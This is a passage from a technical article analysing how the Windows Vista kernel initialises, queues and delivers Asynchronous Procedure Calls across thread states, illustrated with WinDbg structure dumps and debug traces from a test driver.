An APC is represented by the _KAPC structure which can be examined in WinDbg with the comman d 
dt nt!_KAPC. The output from the command is shown below:  
kd> dt nt!_KAPC  
   +0x000 Type             : UChar  
   +0x001 SpareByte0       : UChar  
   +0x002 Size             : UChar  
   +0x003 SpareByte1       : UChar  
   +0x004 SpareLong0       : Uint4B  
   +0x008 Thread           : Ptr32 _KTHREAD  
   +0x00c ApcListEntry     : _LIST_ENTRY  
   +0x014 KernelRoutine    : Ptr32     
   +0x018 RundownRoutine   : Ptr32     
   +0x01c NormalRoutine    : Ptr32     
   +0x020 NormalContext    : Ptr32 Void  
   +0x024 SystemArg ument1  : Ptr32 Void  
   +0x028 SystemArgument2  : Ptr32 Void  
   +0x02c ApcStateIndex    : Char  
   +0x02d ApcMode          : Char  
   +0x02e Inserted         : U char 
 
A _KAPC structure is initialized by calling nt!KeInitializeApc, which has the following  (undocumented)  
prototype:  
7 
 NTKERNELAPI  VOID KeInitializeApc (  
IN PRKAPC Apc,  
IN PKTHREAD Thread,  
IN KAPC_ENVIRONMENT Environment,  
IN PKKERNEL_ROUTINE KernelRoutine,  
IN PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL,  
IN PKNORMAL_ROUTINE NormalRoutine OPTIONAL,  
IN KPROCESSOR_MODE ApcMode,  
IN PVOID NormalContext  
); 
 
This prototype  was published in [1] and  is still valid for Windows Vista SP1.  
Calling nt!KeInitializeApc does not schedule the APC yet: it just fills the members of the _KAPC. To 
actually schedule the APC o ne more step will be required.  
Ke InitializeApc sets t he Type field to a constant value (0x12) which identifies this structure  as a 
_KAPC  and the Size field to 0x30, i.e. the size of the structure rounded up to a multiple of 4.  
The Thread field  is set to t he corresponding function parameter and  contains a pointer to the 
_KTHREAD for the thread the APC is intended for.  
The ApcListEntry is  not set by nt!KeInitializeApc. Rather, it  is used  when the APC is actually 
scheduled,  to chain it to a list of pending AP Cs for the thread.  
The KernelRoutine  field, taken from the function input parameter,  stores a pointer to the function to be 
called when the APC is dispatched.  This is the actual code which will be executed in the context of 
the thread targeted by the APC.  Every APC has a KernelRoutine and, depending on its type it can 
have a NormalRoutine as well.  
The function pointed by KernelRoutine is called  at APC  IRQL . 
The  NormalRoutine and ApcMode  function parameters  determine  the type of  the APC. 
If NormalRoutine is  0, this is a special kernel mode APC . 
For this kind of APCs  nt!KeInitializeApc  sets _KAPC. ApcMode  to  0, which stands for  kernel mode 
and _KAPC.NormalContext to 0. The corresponding function parameters are ignored.  
If NormalRoutine is not 0 and ApcMode i s set to 0, this is a regular kernel mode APC ;  
_KAPC.ApcMode  and _KACP.NormalContext are set from the function parameters . 
This kind of APC  will still execute kernel mode code, as denoted by ApcMode = 0, but it is less 
privileged than a special one , which  means it  can be executed only under certain conditions, which 
will be detailed later.  NormalRoutine is stored in the corresponding _KAPC member and is the 
address of a function which will be called when the APC is delivered . 
When such an APC is servic ed, the KernelRoutine is called first , at APC IRQL. Afterwards, the 
NormalRoutine is called at PASSIVE IRQL. Both functions  execute  in kernel mode.  
As we will see in more detail later, the KernelRoutine has a chance to prevent the execution of the 
NormalRoutin e or to change the address which will be called, before the NormalRoutine comes into 
play.  
8 
 If NormalRoutine is not 0 and ApcMode is set to 1, this is a user mode APC , which will therefore call 
the NormalRoutine  in user mode.  
For user mode APCs, nt!KeInitia lizeApc sets the _KAPC.ApcMode and _KAPC.NormalContext 
members to the value of its corresponding input parameters.  
The NormalContext field is passed to both the kernel routine and the normal routine  when they are 
called.  
SystemArgument1 and 2 are  not set b y nt!KeInitializeApc. Instead, they are  set when an APC is 
scheduled and they are passed to the callback routines as well. We will see this process in much 
more detail later.  
ApcStateIndex determines the environment the APC is for  and will  later be used as  an index into the 
ApcStatePointer array of the thread , to select the _KAPC_STATE where to store the APC . If it has 
any value other than 2, nt!KeInitializeApc stores this value in the corresponding _KAPC field. If it is 2, 
the function sets _KAPC. ApcStateI ndex  to the value of _KTHREAD.  ApcStateIndex  for the input 
thread. Thus, the value 2 means: schedule the APC for whatever environment is current when 
nt!KeInitializeApc is called.  
Finally, the Inserted field is set to 0 by nt!KeInitializeApc and this repre sents the fact that this APC has 
not been queued to its thread yet. nt! KeInsertQeueueApc, which is used to schedule APCs, will set 
this field to 1.  
Initial APC Scheduling  
All kinds of APCs are queued to their thread by calling nt!KeInsertQueueApc. The step s performed by 
this function are the same, regardless of the type of APC for which it is called.  
This function takes as input 4 stack parameters:  
 A pointer to the _KAPC structure  for the APC.  
 Two user -defined values SystemArgument1 and SystemArgument2  
 A priority increment  
nt!KeInsertQueueApc begins by acquiring a spinlock stored in the _KTHREAD for the target thread 
and raising the IRQL to  0x1b , i. e.  profile level. Thus the rest of its operation can be interrupted only 
by the clock and IPI interrupt s. 
Afterwards, it looks into a bit field at offset 0xb0  of the _KTHREAD for  the target thread , to see if bit 6, 
i. e. ApcQueueable  is set. If it’s not, it aborts returning 0 (i. e. FALSE) to its caller.  
The function then checks whether the Inserted field of the input _KAPC is already set to 1 and, if so, 
returns FALSE.  
If the  two checks above are successful , the APC is actually scheduled as follows.  
The function copies the input SystemArgument1 and 2 into the corresponding fields of _KAPC. These 
value will be pas sed to the APC callback s and offer a way to pass  them  context information  when  
scheduling the APC, in contrast with NormalContext, whose value is set at _KAPC initialization time.  
Afterwards, it sets _KAPC.Inserted to 1 and calls nt!KiInsertQueueApc  with e dx set to the input 
priority increment and ecx set to the address of the _KAPC.  
9 
 nt!KiInsertQueueApc  performs the greater part of the APC scheduling process, which will be analyzed 
in distinct sections for the different APC kinds.  
Special And Regular Kernel  Mode APC s 
Scheduling  
The scheduling performed by nt!KiInsertQueueApc  can be split into two main steps: linking the 
_KAPC to a list of pending APCs and updating control variables  for the target thread  so that it will be 
diverted to process the waiting APC.  
Linking _KAPC to Its List 
The function begins by examining again _KAPC. ApcStateIndex . By now, we know that when  
nt!KeInitializeApc  is called to initialize the _KAPC , this field is set from the Environment parameter 
and that the value 2 is a pseudo -value , which  has the effect to  set it to whatever environment is 
current at the time of the call.  
nt!KiInsertQueueApc  allows for yet another psudo -value, 3, which has the same effect: if 
ApcStateIndex is  found to be 3, it is replaced with _KTHREAD. ApcStateIndex  at the time of the call.  
Thus, 2 means current at the time of nt!KeInitializeApc , while 3 means current at the time of 
nt!KiInsertQueueApc . 
The final value of _KAPC.ApcStateIndex is used to select the environment to which th e _KAPC will be 
linked . nt!KiInse rtQueueApc  accesses the _KTHREAD f or the target  thread  at offset +0x14c , where 
we find  ApcStatePointer , i. e. the  array of two pointers to _KAPC_STATE structures (see  APC 
Process Context ). ApcStateIndex is used as the array index to select the correct pointer and the 
_KAPC will be linked to the selected _KAPC_STATE.  
The _KAPC_STATE structure is as follows:  
   +0x000 ApcListHead      : [2] _LIST_ENTRY  
   +0x010 Process          : Ptr32 _KPROCESS  
   +0x014 KernelApcIn Progress : UChar  
   +0x015 KernelApcPending : UChar  
   +0x016 UserApcPending   : Uchar  
 
The ApcListHead  array contains the head of the two APC lists for kernel mode and user mode. 
nt!KiInsertQueueApc  uses the _KAPC. ApcMode  field as an index into it (thus A pcListHead[0] is for 
kernel mode APCs) and links the _KAPC to the list.  
The list for kernel mode APCs, is for both regular and special ones. A special kernel mode APC is 
linked to the list head, i. e., ahead of any eventual regular kernel mode APC already present. If other 
special APCs are already in place, the new one goes behind them  (but still ahead of any regular one).  
Directing The Thread to Execute The APC  
In this section we are going to look at how the target thread is diverted to execute the APC. Th is is 
where the APC software interrupt may be used. As we are going to see, the interrupt is actually used  
only in particular cases, and  control variables are used as well . 
The first step of this process is to check whether the APC environment specified by  
_KAPC. ApcStateIndex  is equal to the current environment, specified by _KTHREAD.ApcStateIndex . 
10 
 If the two are not the same, the function just returns. This looks interesting: nothing is done to divert 
the target thread from its execution path. On one hand,  it makes sense: as long as the thread is 
attached to a different environment, it can’t process the APC  being scheduled . On the other hand, this 
means that the code which switches the thread to a new environment will check whether there are 
APCs in the lis t for it and act to divert the thread to service  them.  
This is the first of many cases where the APC interrupt is not used.  
This logic means that kernel mode APCs, even special ones ,  are kept waiting until the thread 
switches environment on its own accord . 
If the environments match, nt!KiInsertQueueApc  goes on to check whether the APC is for the 
currently executing thread, i. e. the one inside the function itself.   
Kernel APC for The Current Thread  
For this scenario, nt!KiInsertQueueApc  sets KernelApcPendi ng to 1 in the ApcState member of the 
target _KTHREAD . 
As wa saw in the section titled  APC Process Context , ApcState stores the main APC environment, i. 
e. the one currently active. Since we have already deterrmine d that our APC is for the active 
environment, we access the control variables for it directly from the ApcState member, instead of 
using the environment index and the pointer array _KTHREAD.ApcStatePointer.  
KernelApcPending is a very important flag , which  plays a crucial role in breaking into the execution of 
the thread and making it deliver  the APC.  
The SpecialApcDisable Flag  
After setting this flag , nt!KiInsertQueueApc  checks the flag _KTHREAD.SpecialApcDisable : if it’s not 
0, the function returns.  
This means SpecialApcDisable can disable all kinds of kernel mode APCs, including special ones.  
When will then the APC be dispatche d? Part of the answer can be found  in nt!SwapContext. This 
function is executed to load the context of a thread after it has been selected to run and checks the 
KernelApcPending flag: if it is set and if SpecialApcDisable is clear, it triggers APC dispatching for the 
thread. We will see  in greater detail  later how this happens. For now, let’s just keep in mind that 
having KernelApcPe nding set guarantees to have APC dispatched the next time the thread is 
scheduled to run  (providing that SpecialApcDisable has been cleared in the meantime) . 
This begs the question of what happens if the current thread clears  its own  SpecialApcDisable: do  
pending  APCs have to wait  until it passes through nt!SwapContext or are they fired right away? If we 
try setting a breakpoint on write access es to SpecialApcDisable  for a thread of  the system  process, 
we discover there are several kernel functions which u pdate this field , so, there is no single 
“EnableApc” function which clears it . 
However, all the function s I catched in a random test , update SpecialApcDisable according to the 
following pattern. To disable APC s, they decrement it when it is 0, therefore br inging it to 0xffff. To 
reenable them, they increment it , then  check if the final value is 0. If this is the case, they check 
whether the list for kernel mode APCs has any and, if so, call a function  named 
nt!KiCheckForKernelApcDelivery . 
This function t riggers kernel APC delivery for the current thread. If the IRQL is passive,  the function  
raises it to APC and calls nt!KiDeliverApc  (detailed in a later section ), which delivers the APCs.  
11 
 Otherwise, sets _KTHREAD.ApcState.KernelApcPending = 1 and  requests an APC interrupt, which 
will call nt!KiDeliverApc  when the IRQL drops below APC . We will add a few mo re detail about this 
interrupt in a short while.  
Hence, at least in the functions I observed ( nt!NtQueryInformationFile , nt!KeLeaveGuardedRegion , 
nt!IopParseD evice ), kernel APCs are serviced as soon as SpecialApcDisable is zeroed, if the IRQL 
allows it.  
The APC Interrupt  
Now let’s get back to nt!KiInsertQueueApc . We just analyzed what happens if 
_KTHREAD.SpecialApcDisable is not 0; i f, on the other hand, it is 0, the function requests  an APC 
software interrupt by calling hal!HalRequestSoftwareInterrupt , then quits.  
Before exploring the effect of this interrupt, let’s note that the actions performed by 
nt!KiInsertQueueApc when the APC is for the current thread , are the same , both for regular and 
special kernel mode APCs . Hence , the restrictions on  regular APCs , which  are dispatched only when 
certain conditions apply , are implemented into  nt!KiDeliverApc , as we will see later.  
The APC  interrupt can’t be processed r ight now, because inside nt!KiInsertQueueApc  the IRQL is at 
0x1b, but will eventually click when the IRQL is lowered inside nt!Ke InsertQueueApc . When this 
happens, nt!KiDeliverApc is called.  
This lead s us to an interesting question. In the time between the  interrupt request and its servicing, 
the timer keeps interrupting the processor, given that its IRQL is 0x1c, higher than the current one. 
The handler for this interrupt could detect that the quantum for the current thread has expired and 
request a DPC so ftware interrupt to invoke the thread dispatcher .  
In this scenario, when the IRQL is lowered to PASSIVE, there are two outstanding software interrupts: 
the DPC and the APC one, with the former having a higher IRQL and therefore taking priority.  
Thus, the  dispatcher is invoked, which may select a different thread to run. Eventually, the IRQL will 
drop to PASSIVE and the APC interrupt will click, in the context of the wrong thread . However, two 
steps in the overall APC logic save the day.  
 The first one is the APC dispatcher, nt!KiDeliverApc , which is ultimately invoked by the APC interrupt, 
and allows for the case of being called  and finding that there are no APCs in the list. If this happens, it 
just returns . Thus, when invoked for the wrong thread it’s ha rmless.  
Still, we may think we are at risk of “lo osing” the APC for the right thread, given that the interrupt is 
now gone. This is not the case, because the KernelApcPending flag is still set and nt!SwapContext 
will look at it when the original thread wil l get its chance to run again, re -triggering a call to 
nt!KiDeliverApc . 
Can The APC Interrupt Really Break into The Wrong Thread?  
The test driver for this article, for which more details can be found in the  appendix , shows how the 
scenario of the previous section  can actually happen. The test function for this test is 
ApcSpuriousIntTest . 
This function installs hooks at the beginning of nt!SwapContext and nt !KiDeliverApc, which track when  
these functions are called, along  with some data at the time of the call. Then it  raises the IRQL to 
DISPATCH,  schedule s the APC and wastes time  waiting for  the DISPATCH interrupt to be requested. 
Afterwards , it lowers the IRQL to passive, having both the APC and DPC interrupts outstandin g. The 
driver  writes to the debugger console  a trace  of what happens .  
12 
 We are now going to analyze a trace captured with it. It begins with the APC being initialized, then the 
first captured event we see is the call to SwapContext:  
APCTEST - Thr: 0X851D20 30; APC initialized: 0X850F7A9C  
 
APCTEST - SWAP CONTEXT trace  
 
 
APCTEST -  Current IRQL:                    0x1b  
APCTEST -  Current thread:                  0X851D2030  
APCTEST -  Current thread K APC pending:    1 
APCTEST -  Current thread K APC list empty : 0 
APCTEST -  Current thread U APC pending:    0  
APCTEST -  Current thread U APC list empty: 1  
 
APCTEST -  New thread:                      0X84CBB460  
APCTEST -  New thread K APC pending:        0  
APCTEST -  New thread K APC list empty:     1  
APCTEST -  New thread U APC pending:        0  
APCTEST -  New thread U APC list empty:     1  
 
APCTEST -  APC INT:                         1 
 
The SwapContext trace shows  the IRQL at which the function runs ( 0x1b ), then some data on the 
current thread (the one about to b e suspended). First  of all we see that th is thread is indeed the 
same one which initialized the APC ( 0X851D2030 ), then we see that the KernelApcPending flag for it 
is set to 1 and  that its  kernel  APC list is not empty (this is shown by the 0, i. e. false,  value on the 
corresponding line).  
Then we see that the new thread ( 0X84CBB460 ), has KernelApcPending clear, an empty  kernel  APC 
list and the same goes for the user APC data. This tell s us that this thread has no APC to deliver.  
Finally, the line labeled “ APC INT” shows the status of the APC interrupt flag at the ti me of the trace: it 
is set, mean ing that the APC int errupt  resulting from nt!KeInsertQueueApc is pending.  
After the swap context we see a call to nt!KiDeliverApc traced:  
APCTEST - DELIVER APC tra ce 
 
 
APCTEST -  Current IRQL:                    0x1  
APCTEST -  Caller address:                  0X81BB42F7  
APCTEST -  Trap frame:                      00000000  
APCTEST -  Reserved:                        00000000  
APCTEST -  PreviousMode:                    0 
 
APCTEST -  Thread:                          0X84CBB460  
APCTEST -  Thread K APC pending:            0  
APCTEST -  Thread K APC list empty:         1  
APCTEST -  Thread U APC pending:            0  
APCTEST -  Thread U APC list empty:         1  
 
13 
 This trace shows that  the  now current thread is indeed the same that nt!SwapContext was about to 
resume before , and confirms once more that this thread has no pending APCs of any kind.  
Thus, we can see  that this APC interrupt really is a spurious  one: it occurred be cause it was pending, 
but occurred in the wrong thread, so  it is useless. It is also harmless, because nt!KiDeliverApc returns 
without causing any more trouble.  
The remainder of the trace shows that nt!SwapContext  is called to  resume the original threa d, which 
still has its pending A PCs, then, even though there is  no outstanding  APC int errupt , nt!KiDeliverApc 
gets called and finally delivers our APC. This is confirmed by the fac t that we see th e trace from the 
kernel routine:  
APCTEST - SWAP CONTEXT trace  
 
 
APCTEST -  Current IRQL:                    0x1b  
APCTEST -  Current thread:                  0X84CBB460  
APCTEST -  Current thread K APC pending:    0  
APCTEST -  Current thread K APC list empty: 1  
APCTEST -  Current thread U APC pending:    0  
APCTEST -  Current thread U APC list empty: 1  
 
APCTEST -  New thread:                      0X851D2030  
APCTEST -  New thread K APC pending:        1 
APCTEST -  New thread K APC list empty:     0 
APCTEST -  New thread U APC pending:        0  
APCTEST -  New thread U APC li st empty:     1  
 
APCTEST -  APC INT:                         0 
 
APCTEST - DELIVER APC trace  
 
 
APCTEST -  Current IRQL:                    0x1  
APCTEST -  Caller address:                  0X81BB42F7  
APCTEST -  Trap frame:                      00000000  
APCTEST -  Reserved:                        00000000  
APCTEST -  PreviousMode:                    0  
 
APCTEST -  Thread:                          0X851D2030  
APCTEST -  Thread K APC pending:            1  
APCTEST -  Thread K APC list empty:         0  
APCTEST -  Thread U APC pending:            0  
APCTEST -  Thread U APC list empty:         1  
 
APCTEST - KERNEL ROUTINE trace  
 
 
APCTEST -  Thread:                          0X851D2030  
APCTEST -  Thread K APC pending:            0  
APCTEST -  Thread K APC list empty:         1 
APCTEST -  Thread U APC pending:            0  
14 
 APCTEST -  Thread U APC list empty:         1  
APCTEST - TRACE MESSAGE: Returned from KeLowerIrql  
 
Finally, the last trace line is a message written  right after the call to KeLowerIrql returns, indicating 
that all of the above took place while we were inside this function: as soon as the IRQL was lowered, 
the thread was preempted by the DISPATCH interrupt, it regain control later, delivered it s APC 
because of the APC interrupt, and finally resumed execution, r eturning from KeLowerIrql.  
This shows how the “state” information that a kernel APC is pending is actually stored in 
KernelApcPending, which is a per -thread flag and not in the fact that an APC software interrupt is 
outstanding. The software interrupt is m erely an instrument to attempt  to trigger APC dispatching . In 
another test performed with the driver , which will be  detailed  later, we will see how APCs start to fire 
merely by setting KernelApcPending, without requesting any software interrupt.  
Kernel APC  for Another Thread  
For this scenario , nt!KiInsertQueueApc  acquires another spinlock protecting the processor control 
block (_KPRCB) of the executing processor. Note that inside this function we already have a lock 
protecting the APC lists for the thread; now we are synchronizing accesses to the processor data 
structures as well.  
Afterwards, the function sets KernelApcPending  inside ApcState, which ensures the APC will 
eventually fire at some point.  
It then checks the state of the target thread, which, in t his scenario, is not the one executing 
nt!KiInsertQueueApc .  
The thread state is stored in the State member of the _KTHREAD  structure and its documented 
values include READY (1), RUNNING (2) , WAIT (5) . There are also undocumented values like 
DEFERREDREADY (7 - for a thread ready to run for which a processor must be found) and 
GATEWAIT ( 8 - a different kind of wating state ). 
The next sections describe the behaviour of nt!KiInsertQueueApc  for the different thread states.  
APC Targeted at  A RUNNING Thread  
If the thread state is RUNNING, it must be executing on another processor, because we already know 
it is a different thread from the one executing nt!KiInsertQueueApc , thus an IPI (Interpro cessor 
Interrupt) is sent to its  processor, to trigger an APC interrupt for that thread. As in the previous 
section, we are not totally  sure that this interrupt will be serviced by the target thread, but its 
KernelApcPending variable will keep track of the APC for as long as it takes.  
It is interesting to observe that the IPI is requested by calling nt!KiIpiSend  with the following register 
values:  
Ecx = a bitmask corresponding to the number of the processor stored in  the NextProcessor field of 
_KTHREAD for the target thread. This suggests that this field stores the identifier o f the processor 
running the thread (a fact confirmed by an analysis of nt!KiDeferredReadyThread , which is the 
function responsible to choose a processor for a ready thread).  
Edx = 1. Given that an APC interrupt is being requested, with APC IRQL being 1, th is suggests that 
edx stores the IRQL for the interrupt to be sent to the target processor.  
15 
 Before requesting the IPI, nt!KiInsertQueueApc  releases the spinlock for the current processor; after 
the call to nt!KiIpiSend, it returns.  
APC Targeted at  A WAIT  THREAD  
A waiting thread is not eligible to run because it entered the WAIT  state. Under certain conditions, 
nt!KiInsertQueueApc  awakens it and sends it to execute the APC. Thus, when possible, the APC 
does not have to wait until the thread enters the running  state to be dispatched.  
nt!KiInsertQueueApc  begins by comparing the WaitIrql  member of the target _KTHREAD with 0, i. e. 
PASSIVE IRQL. If WaitIrql is not 0, nt!KiInsertQueueApc  exits.  
This gives us an interesting insight on this _KTHREAD member: when a th read enters the WAIT  
state, this member records the IRQL it was running  at, before transitioning to WAIT . 
This is further confirmed by an analysis of nt! KeWaitForSingleObject , which stores into this member 
the current IRQL before calling the dispatcher rou tines which will put the thread into the WAIT  state.  
So, while it’s true that the IRQL is not related to threads, but, rather, is an attribute of a processor  (at 
any given time a processor is running at a given IRQL), it’s also true that the IRQL that was current  
when the thread went into waiting is recorded here.  
Hence, the reasoning behind nt!KiInsertQueueApc  is straightforward: if the thread was not running at 
PASSIVE it was running at APC and as such APC interrupts were masked for it. Thus, it cannot be  
sent to service an APC interrupt, because this w ould break  the IRQL -based  interrupt masking rule.  
As a side note, for a waiting thread WaitIrql should either be PASSIVE or APC, because a thread 
running at IRQL greater than APC cannot enter the WAIT  state.  
As always, the fact that KernelApcPending is set guarantees that when the right conditions will apply, 
the APC will eventually be delivered.  
If the thread is indeed waiting at PASSIVE, nt!KiInsertQueueApc  checks SpecialApcDisable : if it’s not 
0, it exits without awakening the thread.  
If, on the other hand, APCs are enabled and this is a special kernel mode APC, nt!KiInsertQueueApc  
awakens the target thread ; it will be resumed by nt!SwapContext and will dispatch the APC.  
If this is a regular kernel mode AP C, two additional checks are performed.  
First, the KernelApcDisable member of the target _KTHREAD is checked: if it’s not 0, 
nt!KiInsertQueueApc  exits without awake ning the thread. Thus, KernelApcDisable acts like 
SpecialApcDisable, but for regular APCs on ly. 
The second check involves the KernelApcInProgress member of ApcState: again, a non -zero value 
causes nt!KiInsertQueueApc  to exit.  
We will see in nt!KiDeliverApc  that it sets this flag before calling the normal routine for a regular APC. 
This test means  that if the thread entered the WAIT  state while it was in the middle of a regular APC, 
it will not be hijacked by another regular APC. In other words, regular APC  calls can’t be nested.  
We saw earlier that when the APC is targeted at the current thread, nt!KiDeliverApc  is invoked  
(through the interrupt)  regardless of the APC  type, regular or special, which may seem in contrast with  
this behaviour. However, nt!KiDeliverApc  performs the same checks and avoid dispatching a regular 
APC if either of these two f lags is  set. This means that not awakening the thread is a performance 
optimization: even if the  thread had been  awakened , it would not dispatch regular APCs.  
16 
 Thread Awakening A nd nt!KiUnwaitThread  
If nt!KiInsertQueueApc  decides to awaken the thread, it do es so by calling nt!KiUnwaitThread  and this 
unveils an interesting piece of information.  
The DDK documentation states that when a waiting thread is dispatched to process a kernel mode 
APC, it will reenter the WAIT  state afterwards, i. e., the thread does n ot return from the KeWaitFor... 
function after the APC. On the other hand, the DDK also states that a waiting thread dispatched to 
process a user mode APC returns from the waiting function with a return value of 
STATUS_USER_APC . 
By analyzing the code for use r mode APCs, we can see that nt!KiUnwaitThread  is used as well and, 
before calling it, the value 0xc0 is loaded into edx . This value is the same as STATUS_USER_APC.  
On the other hand, for kernel APCs, edx is loaded with 0x100.  
The ntstatus.h file defines S TATUS_USER_APC as 0xc0 and, immediately below, 
STATUS_KERNEL_APC  (not mentioned in the DDK help) as 0x100. This suggests that edx is loaded 
with a value that controls how the waiting function will behave: if it is STATUS_USER_APC, the 
waiting function will  return to th e caller, passing this value alo ng; if it is STATUS_KERNEL_APC, it will 
resume the wait, the caller will never see this value and for this reason it is an undocumented one.  
Another input parameter to nt!KiUnwaitThread  is the priority increment  that nt!KiInsertQueueApc  
received fr om its caller. Interestingly, if  nt!KiInsertQueueApc  had to spin in loops waiting for 
synchronizing locks, this value wa s incremented on each iteration , meaning the priority is boosted 
even more, to compensate for the t ime spent waiting.  
Having awakened the target thread, nt!KiInsertQueueApc  releases the spinlock for the processor 
control block and exits.  
APC Targeted at  A GATEWAIT Thread  
GATEWAIT state, whose value is 8, appears to be another kind of waiting state.  
For such a thread, nt!KiInsertQueueApc  begins by synchronizing on the ThreadLock  member of the 
target thread. This is used like a spinlock, without actually calling the regular spinlock functions: the 
processor spins in a loop until it succeeds in modifying it s value exclusively.  
Having acquired the lock, nt!KiInsertQueueApc  checks whether the thread state is still GATEWAIT or 
has changed and, if the latter is true, exits (releasing all the locks).  This is consistent with the fact that 
for states other than RUN NING, WAIT  and GATEWAIT, nt!KiInsertQueueApc  does nothing  more than 
setting KernelApcPending  (which at this point has already been done).  
This sugge sts that Threa dLock protects the thread State: functio ns changing State  do so only after 
having acquired the lock. 
Afterwards, nt!KiInsertQueueApc  goes through the same checks  it does for WAIT -ing threads: 
WaitIrql must be PASSIVE, SpecialApcDisable must be clear and either this is a special APC or 
KernelApcDisable is clear, along with KernelApcInProgress.  
If all the checks pass, nt!KiInsertQueueApc  does a sort of unwaiting of the thread all by itself.  It 
unchains the thread from a list to which is linked by means of its WaitBlock[0] member and puts it into 
DEFERREDREADY state, like nt!KiUnwaitThread  does for WAIT threads.  
nt!KiInsertQueueApc also sets the WaitStatus member of _KTHREAD to 0x100, i. e. the same “wating 
return” value passed to nt!KiUnwaitThread  for WAIT  threads. nt!KiUnwaitThread  does something 
17 
 similar: stores the value it receives  into W aitStatus,  albeit by ORing the new value (passed into edx) 
with the current one.  It could be that there are higher bits in the WaitStatus field whi ch 
nt!KiUnwaitThread needs to  preserve.  
Furthermore, nt!KiInsertQueueApc  chains the thread to a list pointed by the DeferredReadyListHead  
member of the _KPRCB structure for the executing processor.  
An analysis of nt!KiReadyThread  and nt!KiDeferredReadyThread  shows that DEFERREDREADY is a 
state in which a thread ready to run is placed , before choosing the processor on whic h it will run ; from 
DEFERREDREADY  the thread  will go into READY if the chosen processor is busy running another 
thread or into STANDBY  if the processor can  immediately  start executing the thread.  
Thus, both nt!KiUnwaitThread  and nt!KiInsertQueueApc  start t he same transition which will result in 
the thread becomin g RUNNING and dispatching its APCs.  
WAIT Threads vs GATEWAIT Ones  
It is interesting to compare the steps nt!KiUnwaitThread  goes through  for WAIT threads , with the one 
taken  by nt!KiInsertQueueApc  for GATEWAIT ones . 
Thread Waiting Lists  
For a WAIT thread, nt!KiUnwaitThread  unlink s the thread fr om the objects it is waiting on. The thread 
is linked to them through a list pointed by its Wa itBlockList member, so nt!KiUnwaitThread  walks this 
list and uncha ins each node from its  object.  
These wait blocks, are explained in  [2], p. 164.  They are used to link a thread to the objects (events, 
mutexes, etc) it is waiting on, allowing for the fact that a thread can wait on multiple objects and each 
object can hav e more than one thread waiting on it.  
To implement this m:n relationship, each thread has a list of wait blocks, where each node represents 
an object the thread is waiting on. A wait block is a _KWAIT_BLOCK structure with this layout:  
   +0x000 WaitListEnt ry    : _LIST_ENTRY  
   +0x008 Thread           : Ptr32 _KTHREAD  
   +0x00c Object           : Ptr32 Void  
   +0x010 NextWaitBlock    : Ptr32 _KWAIT_BLOCK  
   +0x014 WaitKey          : Uint2B  
   +0x016 WaitType         : UChar  
   +0x017 SpareByte        : UCha r 
 
The NextWaitBlock field chain s the wait blocks of  a single  thread to one another.  
The Object field points to the object the thread is waiting on.  
When there are more than one thread waiting on the same object , the wait blocks pointing to that 
object are chained in a list by means of their WaitListEntry member.  
In other words, a wait block may be part of two lists: the list  of wait blocks  of a thread and  the list of 
wait block s of an object.  
nt!KiUnwaitThread  walks the  thread  list through the NextWaitBloc k member and unchains each 
_KWAIT_BLOCK .WaitListEntry from the list of  the object.  
nt!KiInsertQueueApc  does something different for GATEWAIT threads.  
18 
 It uses the GateObject member of _KTHREAD  which points  to a _KGATE structure. _KGATE, in turn 
has just one  member: Header, which is a _DISPATCHER_HEADER . 
The first byte of Header is used to synchronize with other processor s, in the same way as a spinlock 
would be: the function spins in a loop until it succee ds in exclusively updating it. _KGATE is therefore 
used as a syncroniza tion lock . 
Having acquired the lock, nt!KiInsertQueueApc  unlinks the thread from a list to which is chained by 
means of its WaitBlock[0]  member. Thus GATEWAIT thread s are also part of a list, but pointed by a 
different member of _KTHREAD.   
WaitBlock[0] is itself of type _KWAIT_BLOCK, i. .e the same type used for WAIT thread. Here, 
however, WaitBlock[0] is embedded into _KTHREAD, while for WAIT threads a list of 
_KWAIT_BLOCK is pointed by _KTHREAD.WaitBlockList.  
Furthermore, a GATEWAIT thre ad is simply unchained from the list pointed by 
WaitBlock[0].WaitListEntry. For  a WAIT thread, the entire list of wait blocks is walked  (through 
NextWaitBlock ) and each node is unchained from the  list for the target object.  
It is also interesting to note t hat the _KTHREAD.GateObject member used to access the 
synchronizing gate is actually the same member which stores _KTHREAD.WaitBlockList: the 
definition for _KTHREAD places both fields in union at o ffset 0x64:  
... 
   +0x064 WaitBlockList    : Ptr32 _KWAIT_BL OCK 
   +0x064 GateObject       : Ptr32 _KGATE     
   +0x068 KernelStackResident : Pos 0, 1 Bit  
... 
 
We can understand that nt!KiInsertQueueApc  is treating offset 0x64 as a pointer to a _KGATE, 
because it uses its first byte for synchronization purposes. If th e pointer were for a _KWAIT_BLOCK, 
the first byte woul d be part of a pointer variable; instead, for a _KGATE, the first byte is a byte value 
named Type (it’s actually the first byte of the embedded _DIS PATCHER_HEADER).  
This means that the same pointer has two different meanings, depending on the thread state.  
Thread Priority Boost  
 nt!KiUnwaitThread  also applies a priority boost to thread; nt!KiInsertQueueApc  does nothing similar 
for a GATEWAIT thread.  
Checking  for Outswapped Processes A nd Stacks  
nt!KiUnwai tThread  brings the thread out of WAIT by calling nt!KiReadyThread . This function does 
more than blindly changing the state to DEFERREDREADY. It checks whether the owning process is 
outswapped and, if this is the case, initiates inswapping for it.  
If the pr ocess is resident,  nt!KiReadyThread  checks whether the thread stack is outswapped, by 
testing  _KTHREAD.KernelStackResident . If it’s not, puts the thread into TRANSITION and queues it 
for stack inswapping.  
Otherwise if the stack is resident, nt!KiReadyThrea d puts (at last!) the thread into 
DEFERREDREADY.  
19 
 On the other hand, nt!KiInsertQueueApc  does not bother with any of these checks for GATEWAIT 
threads: it just sets their state to DEFERREDREADY. This means GATEWAIT -ing thread cannot have 
their stack outswap ped and cannot be part of outswapped processes.  
APC Targetd at Threads in  Other States  
For all other thread states, nt!KiInsertQueueApc  exits.  
However, it does so after having already set the KernelApcPending flag.  
Triggering Thread Dispatching  
As we saw earlier, nt!KeInsertQueueApc  is the function used to schedule APCs, which internally calls 
nt!KiInsertQueueApc . When the latter returns, nt!KeInsertQueueApc  has some more work to do.  
We saw that nt!KiInsertQueueApc  may awaken  a thread that was in WAIT or G ATEWAIT state . When 
this happens , the thread is placed into the DEFERREDREADY state and chained to the list of 
deferred ready threads for the executing processor (_KPRCB. DeferredReadyListHead ). This means 
that the thread can run, i. e. nothing is blocking it, but a processor must be chosen to run it.  To 
accomplish this,  nt!KeInsertQueueApc  calls nt!KiExitDispatcher .  
The logic of nt!KiExitDispatcher  is not covered in detail here, because it could fill an article by itself;  
